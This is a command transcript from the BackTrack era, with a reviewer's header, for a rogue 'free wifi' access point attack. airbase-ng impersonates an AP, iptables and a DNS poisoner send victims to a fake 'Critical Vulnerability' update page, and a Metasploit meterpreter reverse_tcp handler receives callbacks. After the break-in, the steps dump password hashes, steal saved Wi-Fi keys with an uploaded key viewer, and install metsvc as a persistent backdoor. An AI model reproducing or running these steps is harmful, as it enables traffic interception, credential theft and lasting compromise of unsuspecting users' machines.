# Operator notes (BackTrack-era transcript, not a runnable script) for a rogue
# "free wifi" access point lab: airbase-ng fakes the AP on wlan1 and its
# at0 interface is given 10.0.0.1/24, dhcp3-server hands out leases, iptables
# NAT bridges at0 to the wlan0 uplink, lighttpd serves a fake "update" page,
# and a Metasploit multi/handler on 10.0.0.1:55555 waits for
# windows/meterpreter/reverse_tcp callbacks.
# Only run this against hardware and networks you are explicitly authorised
# to test; it impersonates an AP and intercepts other people's traffic.
#
# Two variants follow.
#  "Transparent": client UDP is DNAT'd to the real router 192.168.1.1 and
#  everything is MASQUERADEd out wlan0, so clients keep a working uplink.
#  The later port-80 DNAT to 10.0.0.1 diverts web traffic to the local
#  lighttpd; "allow traffic again" re-runs the flush + NAT setup without
#  that redirector to restore normal browsing.
#  "NON Transparent": UDP and port 80 are both DNAT'd to 10.0.0.1, where
#  `java ServerKernelMain 10.0.0.1 10.0.0.1` (dnspoison) presumably answers
#  the DNS queries and lighttpd answers HTTP; no MASQUERADE / uplink NAT is
#  configured in this variant.
#
# Review notes (the commands below are kept exactly as written):
#  - Each `iptables --flush` / `--delete-chain` wipes the host's existing
#    filter and nat state; there is no save/restore step.
#  - The UDP DNAT rules carry no `--dport 53`, so they match every UDP flow
#    entering PREROUTING, not just DNS. NOTE(review): confirm the clients'
#    DHCP exchanges with the local dhcpd still work under that rule, or scope
#    it with `--dport 53`.
#  - `iptables -P FORWARD ACCEPT` forwards for any source and interface; no
#    `-i at0` / `-s 10.0.0.0/24` restriction is applied.
#  - `ifconfig at0 mtu 1400`: the reason is not stated in the notes
#    (presumably tap/encapsulation overhead) — verify before copying.
#  - `route add -net 10.0.0.0 ...` duplicates the connected route that
#    `ifconfig at0 10.0.0.1 netmask 255.255.255.0` already installs.
#  - The `////`, `//` and `*****` markers are free-text notes, not shell
#    comments; `wlan0 = route to the internet` and `Index html - Untitled
#    Document` are prose, not commands.
#  - Paths under /home/hm/Desktop/http/ and the lighttpd config
#    '/home/hm/Desktop/http/http' are specific to the author's machine.
#  - `session - l` / `session -i` are msfconsole typos for `sessions -l` and
#    `sessions -i <id>`.
#  - Meterpreter steps: `mkdir c:\\windows\\wkviewer4` is followed by
#    `cd wkviewer` (no trailing `4`), while every `upload` targets
#    `C:\\windows\\wkviewer4`; `execute -H -f wkv.bat` then uses a bare
#    filename, which depends on the session's working directory, so the
#    `cd` and the `execute` do not line up as written.
#  - The "misc" note gives the content of wkv.bat (`wkv.exe /stabular
#    wkv.txt`, the wireless key viewer writing its table to wkv.txt, which
#    is then `download`ed), and `metsvc.exe install-service` installs the
#    uploaded metsvc-server.exe / metsrv.dll / metsvc.exe as a persistent
#    service on the target.
dhclient wlan0 //// Connect to the internet, can be eth0 *****Setup metasploit listener********* ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable cd / cd pentest cd exploits cd framework3 ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.0.0.1 set LPORT 55555 show options exploit modprobe tun airbase-ng -P -C 30 -e "free wifi" wlan1 -v ////// can use various commands here ************************* Transparent Airbase ************************* su *************** ifconfig lo up ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address iptables -P FORWARD ACCEPT iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE wlan0 = route to the internet /etc/init.d/dhcp3-server restart // backtrack users use dhcpd /etc/init.d/lighttpd stop lighttpd -D -f '/home/hm/Desktop/http/http' //webserver with fake update page ********************************************************************** direct any request to apache iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 //redirector ********************************************************************** allow traffic again ifconfig lo up ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 iptables -P FORWARD ACCEPT iptables --table nat --append POSTROUTING --out-interface wlan0 
-j MASQUERADE ************************************************************************** ************************************************************************** ************************************************************************** NON Transparent Airbase su *************** modprobe tun airbase-ng -P -C 30 -e "free wifi" wlan1 -v su *************** ifconfig at0 up ifconfig lo up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1 iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 /etc/init.d/dhcp3-server restart /etc/init.d/lighttpd stop lighttpd -D -f '/home/hm/Desktop/http/http' cd / /// dnspoison available at http://dnspentest.sourceforge.net/ cd home cd hm cd Desktop cd dnspoison java ServerKernelMain 10.0.0.1 10.0.0.1 **************************************************************************** **** Check for victims ******** arp -n -v -i at0 session - l session -i sysinfo getuid use priv hashdump ***download keys***** mkdir c:\\windows\\wkviewer4 cd \ cd windows cd wkviewer upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless key viewer upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... check below upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4 upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server execute -H -f wkv.bat cat wkv.txt download wkv.txt /home/hm/Desktop/http/wkv.txt misc...... wkv bat file = wkv.exe /stabular wkv.txt metsvc.exe install-service Index html - Untitled Document

t

Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required.